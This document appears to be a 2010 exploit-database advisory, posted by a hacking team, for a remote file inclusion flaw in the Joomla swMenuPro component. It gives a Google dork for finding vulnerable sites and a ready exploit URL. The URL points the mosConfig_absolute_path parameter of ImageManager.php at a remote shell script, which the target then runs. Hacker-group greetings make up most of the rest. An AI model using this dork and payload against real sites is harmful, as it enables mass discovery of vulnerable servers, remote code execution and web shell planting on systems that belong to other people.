The Joomla swMenuPro component remote file inclusion vulnerability

2010-11-16
ID: 65230
CVE: None
Download vulnerable application: None
Joomla Component com_swmenupro RFI Vulnerability
=========================================================

[+]Title : Joomla Component com_swmenupro RFI Vulnerability
[+]Software  : swMenuPro 
[+]Vendor  : http://www.swmenupro.com/
[+]Download : http://www.filestube.com/d/download+com+swmenupro
[+]Author : jos_ali_joe
[+]Contact : josalijoe[at]yahoo[dot]com
[+]Home  : http://josalijoe.wordpress.com/


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ##########################################        1
0                    I'm jos_ali_joe  member from Inj3ct0r Team        1
1                    ##########################################        0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

########################################################################

Dork : inurl:index.php?option="com_swmenupro"

########################################################################

------------------------------------------------------------------------

RFI Exploit

Exploit :

http://example.com/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=[ Shell txt ]

--------------------------------------------------------------------------


Greets For :

./Devilzc0de crew ? Kebumen Cyber ? Explore Crew ? Indonesian Hacker - Tecon Crew - Security Hub

./Byroe Net - Yogya Carderlink - anten4

My Team : ./Indonesian Coder & inj3ct0r

Special Thanks :

/. google.com


[+] Note : 

Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban. 
Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban, 
Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.
1-4-2 (www01)